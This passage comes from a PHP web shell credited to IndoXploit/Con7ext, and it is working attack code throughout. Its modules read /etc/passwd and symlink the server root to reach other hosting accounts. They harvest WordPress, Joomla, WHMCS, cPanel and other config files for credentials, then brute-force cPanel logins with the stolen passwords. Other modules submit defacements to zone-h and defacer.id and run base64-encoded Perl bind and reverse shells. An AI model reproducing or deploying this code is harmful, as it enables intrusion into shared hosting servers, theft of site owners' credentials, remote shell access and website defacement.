  3112.  $dcount = 1;
  3113.  $file = fopen("/etc/passwd", "r") or exit("Unable to open file!");
  3114.  while(!feof($file)){
  3115.  $s = fgets($file);
  3116.  $matches = array();
  3117.  $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
  3118.  $matches = str_replace("home/","",$matches[1]);
  3119.  if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
  3120.  continue;
  3121.  echo "<tr><td align=center><font size=2>" . $dcount . "</td>
  3122. <td align=center><font class=txt>" . $matches . "</td>";
  3123.  echo "<td align=center><font class=txt><a href=c7e_sym/c7e/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
  3124.  $dcount++;}fclose($file);
  3125.  echo "</table>";}else{if($os != "Windows"){@mkdir("c7e_sym",0777);@chdir("c7e_sym");@exe("ln -s / c7e");$file3 = '
  3126. Options Indexes FollowSymLinks
  3127. DirectoryIndex c7e.htm
  3128. AddType text/plain .php
  3129. AddHandler text/plain .php
  3130. Satisfy Any
  3131. ';
  3132.  $fp3 = fopen('.htaccess','w');
  3133.  $fw3 = fwrite($fp3,$file3);@fclose($fp3);
  3134.  echo "
  3135. <div class='mybox'><h2 class='k2ll33d2'>server symlinker</h2>
  3136. <table align=center border=1><tr>
  3137. <td align=center><font size=3>ID</font></td>
  3138. <td align=center><font size=3>Users</font></td>
  3139. <td align=center><font size=3>Symlink</font></td></tr>";
  3140.  $temp = "";$val1 = 0;$val2 = 1000;
  3141.  for(;$val1 <= $val2;$val1++) {$uid = @posix_getpwuid($val1);
  3142.  if ($uid)$temp .= join(':',$uid)."\n";}
  3143.  echo '<br/>';$temp = trim($temp);$file5 =
  3144.  fopen("test.txt","w");
  3145.  fputs($file5,$temp);
  3146.  fclose($file5);$dcount = 1;$file =
  3147.  fopen("test.txt", "r") or exit("Unable to open file!");
  3148.  while(!feof($file)){$s = fgets($file);$matches = array();
  3149.  $t = preg_match('/\/(.*?)\:\//s', $s, $matches);$matches = str_replace("home/","",$matches[1]);
  3150.  if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
  3151.  continue;
  3152.  echo "<tr><td align=center><font size=2>" . $dcount . "</td>
  3153. <td align=center><font class=txt>" . $matches . "</td>";
  3154.  echo "<td align=center><font class=txt><a href=c7e_sym/c7e/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
  3155.  $dcount++;}
  3156.  fclose($file);
  3157.  echo "</table></div></center>";unlink("test.txt");
  3158.  } else
  3159.  echo "<center><font size=3>Cannot create Symlink</font></center>";
  3160.  }
  3161.  }    
  3162. }
  3163. elseif($_GET['con7ext'] == 'config') {
  3164.     $etc = fopen("/etc/passwd", "r") or die("<pre><font color=red>Can't read /etc/passwd</font></pre>");
  3165.     $idx = mkdir("c7e_conf", 0777);
  3166.     $isi_htc = "Options all\nRequire None\nSatisfy Any";
  3167.     $htc = fopen("c7e_conf/.htaccess","w");
  3168.     fwrite($htc, $isi_htc);
  3169.     while($passwd = fgets($etc)) {
  3170.         if($passwd == "" || !$etc) {
  3171.             echo "<font color=red>Can't read /etc/passwd</font>";
  3172.         } else {
  3173.             preg_match_all('/(.*?):x:/', $passwd, $user_config);
  3174.             foreach($user_config[1] as $c7euser) {
  3175.                 $user_config_dir = "/home/$c7euser/public_html/";
  3176.                 if(is_readable($user_config_dir)) {
  3177.                     $grab_config = array(
  3178.                         "/home/$c7euser/.my.cnf" => "cpanel",
  3179.                         "/home/$c7euser/.accesshash" => "WHM-accesshash",
  3180.                         "/home/$c7euser/public_html/po-content/config.php" => "Popoji",
  3181.                         "/home/$c7euser/public_html/vdo_config.php" => "Voodoo",
  3182.                         "/home/$c7euser/public_html/bw-configs/config.ini" => "BosWeb",
  3183.                         "/home/$c7euser/public_html/config/koneksi.php" => "Lokomedia",
  3184.                         "/home/$c7euser/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
  3185.                         "/home/$c7euser/public_html/clientarea/configuration.php" => "WHMCS",
  3186.                         "/home/$c7euser/public_html/whm/configuration.php" => "WHMCS",
  3187.                         "/home/$c7euser/public_html/whmcs/configuration.php" => "WHMCS",
  3188.                         "/home/$c7euser/public_html/forum/config.php" => "phpBB",
  3189.                         "/home/$c7euser/public_html/sites/default/settings.php" => "Drupal",
  3190.                         "/home/$c7euser/public_html/config/settings.inc.php" => "PrestaShop",
  3191.                         "/home/$c7euser/public_html/app/etc/local.xml" => "Magento",
  3192.                         "/home/$c7euser/public_html/joomla/configuration.php" => "Joomla",
  3193.                         "/home/$c7euser/public_html/configuration.php" => "Joomla",
  3194.                         "/home/$c7euser/public_html/wp/wp-config.php" => "WordPress",
  3195.                         "/home/$c7euser/public_html/wordpress/wp-config.php" => "WordPress",
  3196.                         "/home/$c7euser/public_html/wp-config.php" => "WordPress",
  3197.                         "/home/$c7euser/public_html/admin/config.php" => "OpenCart",
  3198.                         "/home/$c7euser/public_html/slconfig.php" => "Sitelok",
  3199.                         "/home/$c7euser/public_html/application/config/database.php" => "Ellislab");
  3200.                     foreach($grab_config as $config => $nama_config) {
  3201.                         $ambil_config = file_get_contents($config);
  3202.                         if($ambil_config == '') {
  3203.                         } else {
  3204.                             $file_config = fopen("c7e_conf/$c7euser-$nama_config.txt","w");
  3205.                             fputs($file_config,$ambil_config);
  3206.                         }
  3207.                     }
  3208.                 }      
  3209.             }
  3210.         }  
  3211.     }
  3212.     echo "<br><center><a href='?path=$path/c7e_conf'><font>Done</font></a></center>";
  3213. }elseif($_GET['con7ext'] == 'adminer') {
  3214.     $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $path);
  3215.     function adminer($url, $isi) {
  3216.         $fp = fopen($isi, "w");
  3217.         $ch = curl_init();
  3218.               curl_setopt($ch, CURLOPT_URL, $url);
  3219.               curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
  3220.               curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  3221.               curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  3222.               curl_setopt($ch, CURLOPT_FILE, $fp);
  3223.         return curl_exec($ch);
  3224.               curl_close($ch);
  3225.         fclose($fp);
  3226.         ob_flush();
  3227.         flush();
  3228.     }
  3229.     if(file_exists('adminer.php')) {
  3230.         echo "<center><font><a href='$full/adminer.php' target='_blank'>-> Adminer <-</a></font></center>";
  3231.     } else {
  3232.         if(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) {
  3233.             echo "<center><font><a href='$full/adminer.php' target='_blank'>-> Adminer <-</a></font></center>";
  3234.         } else {
  3235.             echo "<center><font color=red>gagal buat file adminer</font></center>";
  3236.         }
  3237.     }
  3238. }elseif($_GET['con7ext'] == 'crkcp') {
  3239. echo '<center>';
  3240.     if($_POST['crack']) {
  3241.         $usercp = explode("\r\n", $_POST['user_cp']);
  3242.         $passcp = explode("\r\n", $_POST['pass_cp']);
  3243.         $i = 0;
  3244.         foreach($usercp as $ucp) {
  3245.             foreach($passcp as $pcp) {
  3246.                 if(@mysql_connect('localhost', $ucp, $pcp)) {
  3247.                     if($_SESSION[$ucp] && $_SESSION[$pcp]) {
  3248.                     } else {
  3249.                         $_SESSION[$ucp] = "1";
  3250.                         $_SESSION[$pcp] = "1";
  3251.                         if($ucp == '' || $pcp == '') {
  3252.                            
  3253.                         } else {
  3254.                             $i++;
  3255.                             if(function_exists('posix_getpwuid')) {
  3256.                                 $domain_cp = file_get_contents("/etc/named.conf"); 
  3257.                                 if($domain_cp == '') {
  3258.                                     $dom =  "<font color=red>gabisa ambil nama domain nya</font>";
  3259.                                 } else {
  3260.                                     preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
  3261.                                     foreach($domains_cp[1] as $dj) {
  3262.                                         $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  3263.                                         $user_cp_url = $user_cp_url['name'];
  3264.                                         if($user_cp_url == $ucp) {
  3265.                                             $dom = "<a href='http://$dj/' target='_blank'><font color=green>$dj</font></a>";
  3266.                                             break;
  3267.                                         }
  3268.                                     }
  3269.                                 }
  3270.                             } else {
  3271.                                 $dom = "<font color=red>function is Disable by system</font>";
  3272.                             }
  3273.                             echo "username (<font color=green>$ucp</font>) password (<font color=green>$pcp</font>) domain ($dom)<br>";
  3274.                         }
  3275.                     }
  3276.                 }
  3277.             }
  3278.         }
  3279.         if($i == 0) {
  3280.         } else {
  3281.             echo "<br>sukses nyolong ".$i." Cpanel by <font color=green>IndoXploit.</font>";
  3282.         }
  3283.     } else {
  3284.         echo "<center>
  3285.         <form method='post'>
  3286.         USER: <br>
  3287.         <textarea style='width: 450px; height: 150px;' name='user_cp'>";
  3288.         $_usercp = fopen("/etc/passwd","r");
  3289.         while($getu = fgets($_usercp)) {
  3290.             if($getu == '' || !$_usercp) {
  3291.                 echo "<font color=red>Can't read /etc/passwd</font>";
  3292.             } else {
  3293.                 preg_match_all("/(.*?):x:/", $getu, $u);
  3294.                 foreach($u[1] as $user_cp) {
  3295.                         if(is_dir("/home/$user_cp/public_html")) {
  3296.                             echo "$user_cp\n";
  3297.                     }
  3298.                 }
  3299.             }
  3300.         }
  3301.         echo "</textarea><br>
  3302.         PASS: <br>
  3303.         <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
  3304.         function cp_pass($path) {
  3305.             $pass = "";
  3306.             $patha = scandir($path);
  3307.             foreach($patha as $pathb) {
  3308.                 if(!is_file("$path/$pathb")) continue;
  3309.                 $ambil = file_get_contents("$path/$path");
  3310.                 if(preg_match("/WordPress/", $ambil)) {
  3311.                     $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
  3312.                 } elseif(preg_match("/JConfig|joomla/", $ambil)) {
  3313.                     $pass .= ambilkata($ambil,"password = '","'")."\n";
  3314.                 } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
  3315.                     $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
  3316.                 } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
  3317.                     $pass .= ambilkata($ambil,'password = "','"')."\n";
  3318.                 } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
  3319.                     $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
  3320.                 } elseif(preg_match("/^[client]$/", $ambil)) {
  3321.                     preg_match("/password=(.*?)/", $ambil, $pass1);
  3322.                     if(preg_match('/"/', $pass1[1])) {
  3323.                         $pass1[1] = str_replace('"', "", $pass1[1]);
  3324.                         $pass .= $pass1[1]."\n";
  3325.                     } else {
  3326.                         $pass .= $pass1[1]."\n";
  3327.                     }
  3328.                 } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
  3329.                     $pass .= ambilkata($ambil,"db_password = '","'")."\n";
  3330.                 }
  3331.             }
  3332.             echo $pass;
  3333.         }
  3334.         $cp_pass = cp_pass($path);
  3335.         echo $cp_pass;
  3336.         echo "</textarea><br>
  3337.         <input type='submit' name='crack' style='width: 450px;' value='Crack'>
  3338.         </form>
  3339.         <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
  3340.     }
  3341. }
  3342. elseif($_GET['con7ext'] == 'zoneh') {
  3343.     if($_POST['submit']) {
  3344. echo '<center>';
  3345.         $domain = explode("\r\n", $_POST['url']);
  3346.         $nick =  $_POST['nick'];
  3347.         echo "Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier=$nick/published=0' target='_blank'>http://www.zone-h.org/archive/notifier=$nick/published=0</a><br>";
  3348.         echo "Defacer Archive: <a href='http://www.zone-h.org/archive/notifier=$nick' target='_blank'>http://www.zone-h.org/archive/notifier=$nick</a><br><br>";
  3349.         function zoneh($url,$nick) {
  3350.             $ch = curl_init("http://www.zone-h.com/notify/single");
  3351.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  3352.                   curl_setopt($ch, CURLOPT_POST, true);
  3353.                   curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
  3354.             return curl_exec($ch);
  3355.                   curl_close($ch);
  3356.         }
  3357.         foreach($domain as $url) {
  3358.             $zoneh = zoneh($url,$nick);
  3359.             if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) {
  3360.                 echo "$url -> <font>OK</font><br>";
  3361.             } else {
  3362.                 echo "$url -> <font color=red>ERROR</font><br>";
  3363.             }
  3364.         }
  3365.     } else {
  3366.         echo "<center><form method='post'>
  3367.         <u>Defacer</u>: <br>
  3368.         <input type='text' name='nick' size='50' value='Con7ext'><br>
  3369.         <u>Domains</u>: <br>
  3370.         <textarea style='width: 450px; height: 150px;' name='url'></textarea><br>
  3371.         <input type='submit' name='submit' value='Submit' style='width: 450px;'>
  3372.         </form>";
  3373.     }
  3374.     echo "</center>";
  3375. }
  3376. elseif($_GET['con7ext'] == 'defid') {
  3377. echo "<center><form method='post'>
  3378.         <u>Defacer</u>: <br>
  3379.         <input type='text' name='hekel' size='50' value='Con7ext'><br>
  3380.         <u>Team</u>: <br>
  3381.         <input type='text' name='tim' size='50' value='XaiSyndicate'><br>
  3382.         <u>Domains</u>: <br>
  3383.         <textarea style='width: 450px; height: 150px;' name='sites'></textarea><br>
  3384.         <input type='submit' name='go' value='Submit' style='width: 450px;'>
  3385.         </form>";
  3386. $site = explode("\r\n", $_POST['sites']);
  3387. $go = $_POST['go'];
  3388. $hekel = $_POST['hekel'];
  3389. $tim = $_POST['tim'];
  3390. if($go) {
  3391. foreach($site as $sites) {
  3392. $zh = $sites;
  3393. $form_url = "https://www.defacer.id/notify";
  3394. $data_to_post = array();
  3395. $data_to_post['attacker'] = "$hekel";
  3396. $data_to_post['team'] = "$tim";
  3397. $data_to_post['poc'] = 'SQL Injection';
  3398. $data_to_post['url'] = "$zh";
  3399. $curl = curl_init();
  3400. curl_setopt($curl,CURLOPT_URL, $form_url);
  3401. curl_setopt($curl,CURLOPT_POST, sizeof($data_to_post));
  3402. curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"); //msnbot/1.0 (+http://search.msn.com/msnbot.htm)
  3403. curl_setopt($curl,CURLOPT_POSTFIELDS, $data_to_post);
  3404. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  3405. curl_setopt($curl, CURLOPT_REFERER, 'https://defacer.id/notify.html');
  3406. $result = curl_exec($curl);
  3407. echo $result;
  3408. curl_close($curl);
  3409. echo "<br>";
  3410. }
  3411. }
  3412. }elseif($_GET['con7ext'] == 'jumping') {
  3413.     $i = 0;
  3414.     echo "<div class='margin: 5px auto;'>";
  3415.     if(preg_match("/hsphere/", $dir)) {
  3416.         $urls = explode("\r\n", $_POST['url']);
  3417.         if(isset($_POST['jump'])) {
  3418.             echo "<pre>";
  3419.             foreach($urls as $url) {
  3420.                 $url = str_replace(array("http://","www."), "", strtolower($url));
  3421.                 $etc = "/etc/passwd";
  3422.                 $f = fopen($etc,"r");
  3423.                 while($gets = fgets($f)) {
  3424.                     $pecah = explode(":", $gets);
  3425.                     $user = $pecah[0];
  3426.                     $dir_user = "/hsphere/local/home/$user";
  3427.                     if(is_dir($dir_user) === true) {
  3428.                         $url_user = $dir_user."/".$url;
  3429.                         if(is_readable($url_user)) {
  3430.                             $i++;
  3431.                             $jrw = "[<font color=green>R</font>] <a href='?path=$url_user'><font color=gold>$url_user</font></a>";
  3432.                             if(is_writable($url_user)) {
  3433.                                 $jrw = "[<font color=green>RW</font>] <a href='?path=$url_user'><font color=gold>$url_user</font></a>";
  3434.                             }
  3435.                             echo $jrw."<br>";
  3436.                         }
  3437.                     }
  3438.                 }
  3439.             }
  3440.         if($i == 0) {
  3441.         } else {
  3442.             echo "<br>Total ada ".$i." Kamar di ".$ip;
  3443.         }
  3444.         echo "</pre>";
  3445.         } else {
  3446.             echo '<center>
  3447.                   <form method="post">
  3448.                   List Domains: <br>
  3449.                   <textarea name="url" style="width: 500px; height: 250px;">';
  3450.             $fp = fopen("/hsphere/local/config/httpd/sites/sites.txt","r");
  3451.             while($getss = fgets($fp)) {
  3452.                 echo $getss;
  3453.             }
  3454.             echo  '</textarea><br>
  3455.                   <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
  3456.                   </form></center>';
  3457.         }
  3458.     } elseif(preg_match("/vhosts/", $dir)) {
  3459.         $urls = explode("\r\n", $_POST['url']);
  3460.         if(isset($_POST['jump'])) {
  3461.             echo "<pre>";
  3462.             foreach($urls as $url) {
  3463.                 $web_vh = "/var/www/vhosts/$url/httpdocs";
  3464.                 if(is_dir($web_vh) === true) {
  3465.                     if(is_readable($web_vh)) {
  3466.                         $i++;
  3467.                         $jrw = "[<font color=green>R</font>] <a href='?path=$web_vh'><font color=gold>$web_vh</font></a>";
  3468.                         if(is_writable($web_vh)) {
  3469.                             $jrw = "[<font color=green>RW</font>] <a href='?path=$web_vh'><font color=gold>$web_vh</font></a>";
  3470.                         }
  3471.                         echo $jrw."<br>";
  3472.                     }
  3473.                 }
  3474.             }
  3475.         if($i == 0) {
  3476.         } else {
  3477.             echo "<br>Total ada ".$i." Kamar di ".$ip;
  3478.         }
  3479.         echo "</pre>";
  3480.         } else {
  3481.             echo '<center>
  3482.                   <form method="post">
  3483.                   List Domains: <br>
  3484.                   <textarea name="url" style="width: 500px; height: 250px;">';
  3485.                   bing("ip:$ip");
  3486.             echo  '</textarea><br>
  3487.                   <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
  3488.                   </form></center>';
  3489.         }
  3490.     } else {
  3491.         echo "<pre>";
  3492.         $etc = fopen("/etc/passwd", "r") or die("<font color=red>Can't read /etc/passwd</font>");
  3493.         while($passwd = fgets($etc)) {
  3494.             if($passwd == '' || !$etc) {
  3495.                 echo "<font color=red>Can't read /etc/passwd</font>";
  3496.             } else {
  3497.                 preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
  3498.                 foreach($user_jumping[1] as $myuser_jump) {
  3499.                     $user_jumping_dir = "/home/$myuser_jump/public_html";
  3500.                     if(is_readable($user_jumping_dir)) {
  3501.                         $i++;
  3502.                         $jrw = "[<font color=green>R</font>] <a href='?path=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
  3503.                         if(is_writable($user_jumping_dir)) {
  3504.                             $jrw = "[<font color=green>RW</font>] <a href='?path=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
  3505.                         }
  3506.                         echo $jrw;
  3507.                         if(function_exists('posix_getpwuid')) {
  3508.                             $domain_jump = file_get_contents("/etc/named.conf");   
  3509.                             if($domain_jump == '') {
  3510.                                 echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
  3511.                             } else {
  3512.                                 preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
  3513.                                 foreach($domains_jump[1] as $dj) {
  3514.                                     $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  3515.                                     $user_jumping_url = $user_jumping_url['name'];
  3516.                                     if($user_jumping_url == $myuser_jump) {
  3517.                                         echo " => ( <u>$dj</u> )<br>";
  3518.                                         break;
  3519.                                     }
  3520.                                 }
  3521.                             }
  3522.                         } else {
  3523.                             echo "<br>";
  3524.                         }
  3525.                     }
  3526.                 }
  3527.             }
  3528.         }
  3529.         if($i == 0) {
  3530.         } else {
  3531.             echo "<br>Total ada ".$i." Kamar di ".$ip;
  3532.         }
  3533.         echo "</pre>";
  3534.     }
  3535.     echo "</div>";
  3536. }elseif($_GET['con7ext'] == 'network') {
  3537.     echo "<form method='post'>
  3538.     <u>Bind Port:</u> <br>
  3539.     PORT: <input type='text' placeholder='port' name='port_bind' value='6969'>
  3540.     <input type='submit' name='sub_bp' value='>>'>
  3541.     </form>
  3542.     <form method='post'>
  3543.     <u>Back Connect:</u> <br>
  3544.     Server: <input type='text' placeholder='ip' name='ip_bc' value='".$_SERVER['REMOTE_ADDR']."'>&nbsp;&nbsp;
  3545.     PORT: <input type='text' placeholder='port' name='port_bc' value='6969'>
  3546.     <input type='submit' name='sub_bc' value='>>'>
  3547.     </form>";
  3548.     $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
  3549.     if(isset($_POST['sub_bp'])) {
  3550.         $f_bp = fopen("/tmp/bp.pl", "w");
  3551.         fwrite($f_bp, base64_decode($bind_port_p));
  3552.         fclose($f_bp);
  3553.  
  3554.         $port = $_POST['port_bind'];
  3555.         $out = exe("perl /tmp/bp.pl $port 1>/dev/null 2>&1 &");
  3556.         sleep(1);
  3557.         echo "<pre>".$out."\n".exe("ps aux | grep bp.pl")."</pre>";
  3558.         unlink("/tmp/bp.pl");
  3559.     }
  3560.     $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
  3561.     if(isset($_POST['sub_bc'])) {
  3562.         $f_bc = fopen("/tmp/bc.pl", "w");
  3563.         fwrite($f_bc, base64_decode($bind_connect_p));
  3564.         fclose($f_bc);
  3565.  
  3566.         $ipbc = $_POST['ip_bc'];
  3567.         $port = $_POST['port_bc'];
  3568.         $out = exe("perl /tmp/bc.pl $ipbc $port 1>/dev/null 2>&1 &");
  3569.         sleep(1);
  3570.         echo "<pre>".$out."\n".exe("ps aux | grep bc.pl")."</pre>";
  3571.         unlink("/tmp/bc.pl");
  3572.     }
  3573. }elseif($_GET['con7ext'] == 'jumping') {
  3574.     $i = 0;
  3575.     echo "<div class='margin: 5px auto;'>";
  3576.     if(preg_match("/hsphere/", $dir)) {
  3577.         $urls = explode("\r\n", $_POST['url']);
  3578.         if(isset($_POST['jump'])) {
  3579.             echo "<pre>";
  3580.             foreach($urls as $url) {
  3581.                 $url = str_replace(array("http://","www."), "", strtolower($url));
  3582.                 $etc = "/etc/passwd";
  3583.                 $f = fopen($etc,"r");
  3584.                 while($gets = fgets($f)) {
  3585.                     $pecah = explode(":", $gets);
  3586.                     $user = $pecah[0];
  3587.                     $dir_user = "/hsphere/local/home/$user";
  3588.                     if(is_dir($dir_user) === true) {
  3589.                         $url_user = $dir_user."/".$url;
  3590.                         if(is_readable($url_user)) {
  3591.                             $i++;
  3592.                             $jrw = "[<font color=green>R</font>] <a href='?path=$url_user'><font color=gold>$url_user</font></a>";
  3593.                             if(is_writable($url_user)) {
  3594.                                 $jrw = "[<font color=green>RW</font>] <a href='?path=$url_user'><font color=gold>$url_user</font></a>";
  3595.                             }
  3596.                             echo $jrw."<br>";
  3597.                         }
  3598.                     }
  3599.                 }
  3600.             }
  3601.         if($i == 0) {
  3602.         } else {
  3603.             echo "<br>Total ada ".$i." Kamar di ".$ip;
  3604.         }
  3605.         echo "</pre>";
  3606.         } else {
  3607.             echo '<center>
  3608.                   <form method="post">
  3609.                   List Domains: <br>
  3610.                   <textarea name="url" style="width: 500px; height: 250px;">';
  3611.             $fp = fopen("/hsphere/local/config/httpd/sites/sites.txt","r");
  3612.             while($getss = fgets($fp)) {
  3613.                 echo $getss;
  3614.             }
  3615.             echo  '</textarea><br>
  3616.                   <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
  3617.                   </form></center>';
  3618.         }
  3619.     } elseif(preg_match("/vhosts/", $dir)) {
  3620.         $urls = explode("\r\n", $_POST['url']);
  3621.         if(isset($_POST['jump'])) {
  3622.             echo "<pre>";
  3623.             foreach($urls as $url) {
  3624.                 $web_vh = "/var/www/vhosts/$url/httpdocs";
  3625.                 if(is_dir($web_vh) === true) {
  3626.                     if(is_readable($web_vh)) {
  3627.                         $i++;
  3628.                         $jrw = "[<font color=green>R</font>] <a href='?path=$web_vh'><font color=gold>$web_vh</font></a>";
  3629.                         if(is_writable($web_vh)) {
  3630.                             $jrw = "[<font color=green>RW</font>] <a href='?path=$web_vh'><font color=gold>$web_vh</font></a>";
  3631.                         }
  3632.                         echo $jrw."<br>";
  3633.                     }
  3634.                 }
  3635.             }
  3636.         if($i == 0) {
  3637.         } else {
  3638.             echo "<br>Total ada ".$i." Kamar di ".$ip;
  3639.         }
  3640.         echo "</pre>";
  3641.         } else {
  3642.             echo '<center>
  3643.                   <form method="post">
  3644.                   List Domains: <br>
  3645.                   <textarea name="url" style="width: 500px; height: 250px;">';
  3646.                   bing("ip:$ip");
  3647.             echo  '</textarea><br>
  3648.                   <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
  3649.                   </form></center>';
  3650.         }
  3651.     } else {
  3652.         echo "<pre>";
  3653.         $etc = fopen("/etc/passwd", "r") or die("<font color=red>Can't read /etc/passwd</font>");
  3654.         while($passwd = fgets($etc)) {
  3655.             if($passwd == '' || !$etc) {
  3656.                 echo "<font color=red>Can't read /etc/passwd</font>";
  3657.             } else {
  3658.                 preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
  3659.                 foreach($user_jumping[1] as $myuser_jump) {
  3660.                     $user_jumping_dir = "/home/$myuser_jump/public_html";
  3661.                     if(is_readable($user_jumping_dir)) {
  3662.                         $i++;
  3663.                         $jrw = "[<font color=green>R</font>] <a href='?path=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
  3664.                         if(is_writable($user_jumping_dir)) {
  3665.                             $jrw = "[<font color=green>RW</font>] <a href='?path=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
  3666.                         }
  3667.                         echo $jrw;
  3668.                         if(function_exists('posix_getpwuid')) {
  3669.                             $domain_jump = file_get_contents("/etc/named.conf");   
  3670.                             if($domain_jump == '') {
  3671.                                 echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
  3672.                             } else {
  3673.                                 preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
  3674.                                 foreach($domains_jump[1] as $dj) {
  3675.                                     $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  3676.                                     $user_jumping_url = $user_jumping_url['name'];
  3677.                                     if($user_jumping_url == $myuser_jump) {
  3678.                                         echo " => ( <u>$dj</u> )<br>";
  3679.                                         break;
  3680.                                     }
  3681.                                 }
  3682.                             }
  3683.                         } else {
  3684.                             echo "<br>";
  3685.                         }
  3686.                     }
  3687.                 }
  3688.             }
  3689.         }
  3690.         if($i == 0) {
  3691.         } else {
  3692.             echo "<br>Total ada ".$i." Kamar di ".$ip;
  3693.         }
  3694.         echo "</pre>";
  3695.     }
  3696.     echo "</div>";
  3697. }elseif($_GET['con7ext'] == 'mail') {
  3698. if($_POST['send']) {
  3699.   $to = $_POST['to'];
  3700.   $from = $_POST['from'];
  3701.   $subject = $_POST['subject'];
  3702.   $content = sulap($_POST['content']);
